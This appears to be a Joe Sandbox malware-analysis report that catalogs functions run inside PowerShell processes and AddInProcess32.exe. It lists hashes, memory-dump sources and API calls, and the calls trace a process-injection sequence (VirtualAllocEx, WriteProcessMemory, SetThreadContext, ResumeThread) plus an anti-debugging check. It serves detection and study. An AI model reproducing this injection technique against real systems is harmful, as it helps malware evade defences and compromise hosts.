Opcode Fuzzy Hash: e0bcb9343d6f71cf9e63240c1b613e9a589f4db4b9b53a4f26a0e527e0d2b836
Instruction Fuzzy Hash: AF012D6240E3C49FD7128B259894B52BFB49F47224F1D81CBD9888F1A3C2695845C772

Analysis Process: powershell.exePID: 5052, Parent PID: 4176COMMON

Executed Functions

Function 07DD1C10 Relevance: .6, Instructions: 588COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2156395588.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 556d5a53123ce01b4b4e257ab61b479ea71ae9e20232868832028a5ffcb738ed
Instruction ID: 6760269932c5d8c64dcf649a2b63e6f8fb6adf207def91288e99ea203805be29
Opcode Fuzzy Hash: 556d5a53123ce01b4b4e257ab61b479ea71ae9e20232868832028a5ffcb738ed
Instruction Fuzzy Hash: 361259B1B043469FDB119B78881076AFBA2AFC6210F1584ABD945DB242DF36DD42C7A2

Function 03584C00 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2151683643.0000000003580000.00000040.00000800.00020000.00000000.sdmp, Offset: 03580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4efdd70bc1f8857e663bc1f310a0fbd483d02f843bc8b88983b70d6fe0e159d1
Instruction ID: 95d02b269815b3209bada497402cefd57f2ef0cdee30f363b35d689448e3c73f
Opcode Fuzzy Hash: 4efdd70bc1f8857e663bc1f310a0fbd483d02f843bc8b88983b70d6fe0e159d1
Instruction Fuzzy Hash: 9951917090A3E19FC707DB6CD8A4599BFB4AF47300B0940CBC495DF2A3D664A809C7A5

Function 07DD1BF0 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2156395588.0000000007DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7dd0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45b60312fea765f2451352fbdff828e163c4d789102d2f49c20bebe024b35ce3
Instruction ID: e93e2acf5b82902b98ed719d8b78b183bddeeb39a9a97bf9c61baf4f4937e0d2
Opcode Fuzzy Hash: 45b60312fea765f2451352fbdff828e163c4d789102d2f49c20bebe024b35ce3
Instruction Fuzzy Hash: 434126F0B0030ADFDB218B688510B69FBB2EF85600B1A84A5D904EF256D737DD46C7A1

Function 03582B00 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2151683643.0000000003580000.00000040.00000800.00020000.00000000.sdmp, Offset: 03580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4604dfef1e1cff0c43bac233bbf5e2ebeff4e1ef3f60381fab98cf0dbf899b62
Instruction ID: 8329ddd4031e5dea06de6d9538811d12b4694a8f62e38997632758741f2e9772
Opcode Fuzzy Hash: 4604dfef1e1cff0c43bac233bbf5e2ebeff4e1ef3f60381fab98cf0dbf899b62
Instruction Fuzzy Hash: 08516874A00205DFCB06CF59C5989BAFBB1FF48310B15869AC916AB365C736FC42CBA0

Function 03584BF0 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2151683643.0000000003580000.00000040.00000800.00020000.00000000.sdmp, Offset: 03580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3580000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b748919c19b116016170a580b028b34789bff29bef372754220be93370d5f43b
Instruction ID: a8c234a1baac8803d9552492ed796b8692960ef831c748b02921e12fa57db8b6
Opcode Fuzzy Hash: b748919c19b116016170a580b028b34789bff29bef372754220be93370d5f43b
Instruction Fuzzy Hash: 45213AB4A0020ACFCB00DF99D9809AEFBF5FF89310B158195D919AB362C731EC41CBA0

Function 0350D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2151182435.000000000350D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_350d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bad492ff23c4cb601db613762f9a74595c6f5eaeb08423b172486ad8363490c
Instruction ID: 2640d44c94e664c0c2f6e76ab57cb9e819530516254948309e7b4a7432bd750e
Opcode Fuzzy Hash: 1bad492ff23c4cb601db613762f9a74595c6f5eaeb08423b172486ad8363490c
Instruction Fuzzy Hash: 9B01F771405344DAE720CA66EA84B66FFECEF41324F1CC45ADD4C4A2E2D6BA9441C6B1

Function 0350D006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2151182435.000000000350D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0350D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_350d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f9af4021590715cdb62d48fb7f7137bf50b613ee81a0edce290d72e8c0506d5
Instruction ID: 78165e2f6850d390594b4687490a56ac10eeb76157f82f3f7345146822fa9dd2
Opcode Fuzzy Hash: 3f9af4021590715cdb62d48fb7f7137bf50b613ee81a0edce290d72e8c0506d5
Instruction Fuzzy Hash: 1B012D7240E3C09ED7128B259994B52BFB8EF43224F1D81CBD9888F2A3C2695849C772

Non-executed Functions

Function 03582041 Relevance: 5.0, Strings: 4, Instructions: 30COMMON

Download Yara Rule

Strings

q, xrefs: 03582072
q, xrefs: 03582062
q, xrefs: 0358204A
q, xrefs: 03582082

Memory Dump Source

Source File: 00000003.00000002.2151683643.0000000003580000.00000040.00000800.00020000.00000000.sdmp, Offset: 03580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3580000_powershell.jbxd

Similarity

API ID:
String ID: q$q$q$q
API String ID: 0-594874556
Opcode ID: e14859a2cc661d4559c18d72912cb918ede36b1f7fa5a5482cbd8f5e3a9ae34e
Instruction ID: 56995d0ed4a0d02c495e1a3d4a69827c8fc2f92975ec0ee1f552e1797873887d
Opcode Fuzzy Hash: e14859a2cc661d4559c18d72912cb918ede36b1f7fa5a5482cbd8f5e3a9ae34e
Instruction Fuzzy Hash: 67F0FE96C0E3C9AFD72352245C291A47F706F33210F5901E78D648B5D3F48D1869C35B

Analysis Process: powershell.exePID: 4616, Parent PID: 1136COMMON

Executed Functions

Function 0304D006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2819411749.000000000304D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0304D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_304d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e68be3baefcc48c2972c21830e6de244c31131f7942b764d4db807f32ae14a6
Instruction ID: 7a25a3695c00e8976d92761542f0d1a229f504e5b6e093bf98c54b169d46b3e7
Opcode Fuzzy Hash: 3e68be3baefcc48c2972c21830e6de244c31131f7942b764d4db807f32ae14a6
Instruction Fuzzy Hash: 4F019EB240E3C09FE7128B258C84752BFA8EF43224F0D80DBE9888F1A3C2685D45C772

Function 0304D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2819411749.000000000304D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0304D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_304d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b8e4946444ec5b992f0c13866e2923fff89bfc3ec79c955a3de67102cfdba9a
Instruction ID: 6f196be70bc8bf4973a4c7a458b6f36e438faa4a548c6c09cfb3d283ac148d9b
Opcode Fuzzy Hash: 0b8e4946444ec5b992f0c13866e2923fff89bfc3ec79c955a3de67102cfdba9a
Instruction Fuzzy Hash: 7001F2B14063409AE7208A25CD84B66FFD8EF81324F0CC46AEE080B243C6B89A41C6B1

Function 03173006 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2820442664.0000000003170000.00000040.00000800.00020000.00000000.sdmp, Offset: 03170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3170000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe8ed05015cfb6cf1fde5f7768446802b7b94b2300742fbe765483a03b0c386
Instruction ID: 194a01ae632997a26c5a5eb00c5c4355c25e1253ac7d3e764cbc0f639b3dcaf3
Opcode Fuzzy Hash: 1fe8ed05015cfb6cf1fde5f7768446802b7b94b2300742fbe765483a03b0c386
Instruction Fuzzy Hash: 7CF0D435A00109DFCB15CF9DD990AEEF7B1FF88324F248159E565A72A1C732AC62CB60

Analysis Process: powershell.exePID: 7036, Parent PID: 4616COMMON

Execution Graph

Execution Coverage:	4.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	62
Total number of Limit Nodes:	5

Executed Functions

Function 030CA920 Relevance: 6.7, APIs: 4, Instructions: 666memoryprocessthreadCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 030CABDA
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 030CAC7C

Part of subcall function 030C9498: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18912514,00000000,?,?,?,00000000,00000000,?,030CACDF,?,00000000,?), ref: 030CB554

ResumeThread.KERNELBASE(?), ref: 030CAEFF
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 030CB264

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: eac744ecb2a0c4a5954c1a156d37896af4c72242789e451e9d5f8cbee20a4ef6
Instruction ID: 8192fa3da90cb023471e231a88309a5788f34701382ce0d0f50b47f564377302
Opcode Fuzzy Hash: eac744ecb2a0c4a5954c1a156d37896af4c72242789e451e9d5f8cbee20a4ef6
Instruction Fuzzy Hash: A242B070A12259CFEB64DF69C850B9EB7F2AF84300F2485ADD809AB391DB749D81CF51

Function 030CA58D Relevance: 5.3, APIs: 3, Instructions: 839COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5eb4673ca6322529c3253ffbc1fd50a3d5aaef2f44d3bafdde79e59feeb1e2b
Instruction ID: 578aba7863edff498b27fe1eddc1e9e2c0d2ce3fab61feb7c96ecebd106d4524
Opcode Fuzzy Hash: d5eb4673ca6322529c3253ffbc1fd50a3d5aaef2f44d3bafdde79e59feeb1e2b
Instruction Fuzzy Hash: 5102AF70A162598FEB64CB65CC45B9EF7B6AF84344F2480ADE908E7391DB719D80CF11

Function 075F0F20 Relevance: 2.6, Strings: 2, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84j, xrefs: 075F0F4B
84j, xrefs: 075F0F57

Memory Dump Source

Source File: 0000000A.00000002.2474824662.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75f0000_powershell.jbxd

Similarity

API ID:
String ID: 84j$84j
API String ID: 0-2158658770
Opcode ID: 844a879d29ed4334d07cfbb76376b34776c31884847b487c2adc521814c10d5f
Instruction ID: 608d534c7c58e9a84d13ad702ee0169de5c4826ce7ea2951443f7077dc501b7b
Opcode Fuzzy Hash: 844a879d29ed4334d07cfbb76376b34776c31884847b487c2adc521814c10d5f
Instruction Fuzzy Hash: 6F417B70A05395AFC7225B6888547AABFB5BF86710F18809BE644DF2C7CA70DD41C3A2

Function 030C9474 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 030CB264

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1e0de3bc2e6c6e1d1da8a88d94efbd81bcf988d5dee7f96782b437d9058f203b
Instruction ID: 3311a86ce45703318955e9f12081c33f8b68f0bac796a453523c42880b4d92d0
Opcode Fuzzy Hash: 1e0de3bc2e6c6e1d1da8a88d94efbd81bcf988d5dee7f96782b437d9058f203b
Instruction Fuzzy Hash: CE514871901269DFEF60CF99C980BDDBBB5BF48310F1084AAE909B7240DB759A84CF90

Function 030C9498 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18912514,00000000,?,?,?,00000000,00000000,?,030CACDF,?,00000000,?), ref: 030CB554

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e58b99f2e7f1151afb4bf966839976f5f88ee44997a7093c8d66ea35842242f1
Instruction ID: 8b220ec42248d9c6174af9a31f4d571bb4be56622ee3d0f8463a7fc39daf49be
Opcode Fuzzy Hash: e58b99f2e7f1151afb4bf966839976f5f88ee44997a7093c8d66ea35842242f1
Instruction Fuzzy Hash: 372107B1911349DFDB50CF9AD985BDEFBF4FB48320F548429E518A7200D378A944CBA5

Function 030CB4D0 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18912514,00000000,?,?,?,00000000,00000000,?,030CACDF,?,00000000,?), ref: 030CB554

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: bf0368b2f51ed517ab7a8ed506a377849770ae6a20376d0bc597f40f1406abc5
Instruction ID: 59a7f48f0cee1800d5928849381f99de04b7db2eb5fd690443bdf09d843e93a5
Opcode Fuzzy Hash: bf0368b2f51ed517ab7a8ed506a377849770ae6a20376d0bc597f40f1406abc5
Instruction Fuzzy Hash: 1D2134B28113499FDB10CF99C984BDEFBF4FB48320F50842AE518A7200D378A544CFA1

Function 030CB359 Relevance: 1.6, APIs: 1, Instructions: 61
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,030CAA93), ref: 030CB3CB

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f77d9d1b3ad29c929eef9ba21e5670cbd632a979b0fcc5d64f631944510399c8
Instruction ID: 3206a28ee1981c4fb648a1f196150309ad8174ef895d3bdcaa9e8d9b52078199
Opcode Fuzzy Hash: f77d9d1b3ad29c929eef9ba21e5670cbd632a979b0fcc5d64f631944510399c8
Instruction Fuzzy Hash: 0A1126B28106598FDB10CF9AD845BDEFBF4EB88220F14852EE458B3640D778A545CFA5

Function 030C9480 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,030CAA93), ref: 030CB3CB

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 0b5544a9f1aeed500e9de16584fa561b412454461c33f4b33fdc7fcc85546860
Instruction ID: edbf5f8823c7a888eef911cf9879b1fae316f69a34bef7b0aaf19f56cf9e812f
Opcode Fuzzy Hash: 0b5544a9f1aeed500e9de16584fa561b412454461c33f4b33fdc7fcc85546860
Instruction Fuzzy Hash: E71114B29106498FDB50CF9AC885BDEFBF4FB88220F148429E458B3600D7B8A545CFA5

Function 030C94A4 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,030CAA93), ref: 030CB3CB

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e1b05c4ce9bc6ae59f61e12c8e39c0749540bf22b1ddda504910b42571bd80c6
Instruction ID: 185a5d36a54473ab9fc6590043896cbf1a0c759df43047a3721f41e9a0eda2ee
Opcode Fuzzy Hash: e1b05c4ce9bc6ae59f61e12c8e39c0749540bf22b1ddda504910b42571bd80c6
Instruction Fuzzy Hash: 4D1126B29106498FDB50CF9AC885BDEFBF4FB88220F14842DE458A3200D7B8A545CFA5

Function 075F0EA8 Relevance: 1.4, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

84j, xrefs: 075F0F4B

Memory Dump Source

Source File: 0000000A.00000002.2474824662.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75f0000_powershell.jbxd

Similarity

API ID:
String ID: 84j
API String ID: 0-795915285
Opcode ID: 0700cc6c33aa8d1aeffefa14a93a93731c9ae678f9d1cb4006297a6efea0601a
Instruction ID: 84ff81ed47d9f14f2b3943a232b3933a903fca5a5fa1d6e68edcdead0cb62424
Opcode Fuzzy Hash: 0700cc6c33aa8d1aeffefa14a93a93731c9ae678f9d1cb4006297a6efea0601a
Instruction Fuzzy Hash: D041D471A053859FC711DB68C890AA9FFB1FF86210F19849BDA489F297CB31DC46C761

Function 075F11E8 Relevance: .6, Instructions: 648COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2474824662.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95dbaba6400d082add7a388e3fd25e30714369856c25b9b1537653d19c0fc7fc
Instruction ID: 99ad82d970c50997ca8769a85e3350a908d66469699442e0af36875e7227c110
Opcode Fuzzy Hash: 95dbaba6400d082add7a388e3fd25e30714369856c25b9b1537653d19c0fc7fc
Instruction Fuzzy Hash: B41227B5B0064EDFDB249A79C8007EABBE6BFC5211F24846BD645CB646DF31C841C7A2

Function 075F2E88 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2474824662.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff1cb05f80fc5a2a7dfba1a7d7fd0fb48c1db2f8e290289b58ff690fca69379
Instruction ID: f4454cb87ac20a0b93074baec455bd86e8b722e4a1a4640b41b7c1df08ca66c6
Opcode Fuzzy Hash: 7ff1cb05f80fc5a2a7dfba1a7d7fd0fb48c1db2f8e290289b58ff690fca69379
Instruction Fuzzy Hash: 2412F6B1B0420ADFEB159F69C8447EABBA2FFC5211F14847BD6458B251DB32C886CB91

Function 075F2370 Relevance: .4, Instructions: 353
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000A.00000002.2474824662.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e22267a98d6f4d0d164e6c71e0b5934cb207e9bb75891ad7729707e4739d0169
Instruction ID: 9ec4cdf377d6ac3259b26f7ea3e6a9a78e6dc67325a4679b05d6bf5704f39076
Opcode Fuzzy Hash: e22267a98d6f4d0d164e6c71e0b5934cb207e9bb75891ad7729707e4739d0169
Instruction Fuzzy Hash: 57B125F1B04246DFDB259A6988107EEBBA6FFC1210F24847BDA05CB246DF75C941C7A2

Function 075F11CD Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2474824662.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_75f0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 167393a85e6a81b64a9a5cd5ca40dd0133b007996e624201c16af4c2304d62ce
Instruction ID: 911bb19607bd91fbe2f7742bbcaf21942145fa521dc67f5ad268db3ab6542188
Opcode Fuzzy Hash: 167393a85e6a81b64a9a5cd5ca40dd0133b007996e624201c16af4c2304d62ce
Instruction Fuzzy Hash: B3314BF0A0470EDFDB208FAAC9003F977A5BF81210F54456BDA44EB582DB36C980C762

Function 0301D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2425787481.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_301d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc3a6835949680a6372a6b092054b93f314354d733ec83e4a99e2622b14563d1
Instruction ID: cdf83031be20e15934a007c7eac7bd0599d987ac4bec1fc2a3939296ad7d2cbd
Opcode Fuzzy Hash: bc3a6835949680a6372a6b092054b93f314354d733ec83e4a99e2622b14563d1
Instruction Fuzzy Hash: F101F272406340AAE7528E29C9C0B76FFD8EF81324F1CC45AEE480A242CBB99841C6B1

Function 0301D007 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2425787481.000000000301D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0301D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_301d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67851dc119a308886635f592413b25751681eb9ee7dada2196c986be70154dc1
Instruction ID: 1ea34ab26ad3fb6ca2154d53d4d2633f632b5ef2c02c3c86fb799abe8231c929
Opcode Fuzzy Hash: 67851dc119a308886635f592413b25751681eb9ee7dada2196c986be70154dc1
Instruction Fuzzy Hash: 1801007240E3C09ED7538B25D994B62BFB4EF43224F1D81DBD9888F2A3C2699845C772

Non-executed Functions

Function 030C9FE6 Relevance: .3, Instructions: 286COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc62d1b170e1e6ef247fca4c5ed673562c94a624ef19252552980a58724fa25
Instruction ID: 4fdc9720069205864058e196f81bcbe121e045903662d397a5d55c7faafce9ae
Opcode Fuzzy Hash: 7cc62d1b170e1e6ef247fca4c5ed673562c94a624ef19252552980a58724fa25
Instruction Fuzzy Hash: CD91B474B1229D8BDB08EB78846467EBBB3BFC9701B04856ED403E7289CF359C528795

Function 030C50CF Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2426528649.00000000030C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_30c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cd722aa0d6063550a39f625ed2b6c47d79242569b5e535959edfcb08caa8976
Instruction ID: 56d2eeff053753b2235984814468657ae23ca1bfc3aab6be2458ebdcdf2a1f94
Opcode Fuzzy Hash: 6cd722aa0d6063550a39f625ed2b6c47d79242569b5e535959edfcb08caa8976
Instruction Fuzzy Hash: 62419C2641E3E15FD7039B39A8B01D67FB09E5326470E10C7C4D0CF1A3D918595ECBAA

Analysis Process: AddInProcess32.exePID: 1012, Parent PID: 7036COMMON

Execution Graph

Execution Coverage:	8.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	21.4%
Total number of Nodes:	14
Total number of Limit Nodes:	2

Executed Functions

Function 01167090 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01167107

Memory Dump Source

Source File: 0000000C.00000002.3340928459.0000000001160000.00000040.00000800.00020000.00000000.sdmp, Offset: 01160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1160000_AddInProcess32.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 105bf744b87f6dbef9e651369d49f53bf14c27b868792844a400d89ff13c504d
Instruction ID: 72bbcbfbc22c8132e4aa59e8cf69ab29e2049646886b035a18b3088625850406
Opcode Fuzzy Hash: 105bf744b87f6dbef9e651369d49f53bf14c27b868792844a400d89ff13c504d
Instruction Fuzzy Hash: BD2148B1800259CFDB04CF9AD884BEEBBF4BF48220F14841AE558A3240D778A944CF61

Function 0660C5D2 Relevance: 6.1, APIs: 4, Instructions: 137
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0660C656
GetCurrentThread.KERNEL32 ref: 0660C693
GetCurrentProcess.KERNEL32 ref: 0660C6D0
GetCurrentThreadId.KERNEL32 ref: 0660C729

Memory Dump Source

Source File: 0000000C.00000002.3359942700.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6600000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9bb72e5eed02488e9baf63ee64460d0f926cf9cfee1b758d28433fdd9dfa7704
Instruction ID: c8720ecac5c097eae9d6d94705f9fcbd1b19f531b4dadf8fdbf9e85f099fab48
Opcode Fuzzy Hash: 9bb72e5eed02488e9baf63ee64460d0f926cf9cfee1b758d28433fdd9dfa7704
Instruction Fuzzy Hash: 735188B0910309DFEB58CFAAD948BAEBBF5FF88314F208519E009A7390DB745944CB65

Function 0660C5D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0660C656
GetCurrentThread.KERNEL32 ref: 0660C693
GetCurrentProcess.KERNEL32 ref: 0660C6D0
GetCurrentThreadId.KERNEL32 ref: 0660C729

Memory Dump Source

Source File: 0000000C.00000002.3359942700.0000000006600000.00000040.00000800.00020000.00000000.sdmp, Offset: 06600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6600000_AddInProcess32.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b23ed3ff583e0f8012e7276eb9b6925141c205dd909a09b215654dd7d352c6a6
Instruction ID: 56385779fb7bd059006721fd49f54452008d251b027cd5387c52c17dda502602
Opcode Fuzzy Hash: b23ed3ff583e0f8012e7276eb9b6925141c205dd909a09b215654dd7d352c6a6
Instruction Fuzzy Hash: 925157B0910309DFEB58CFAAD948BAEBBF1FF88314F208519D009A7390DB759944CB65

Function 01167089 Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 01167107

Memory Dump Source

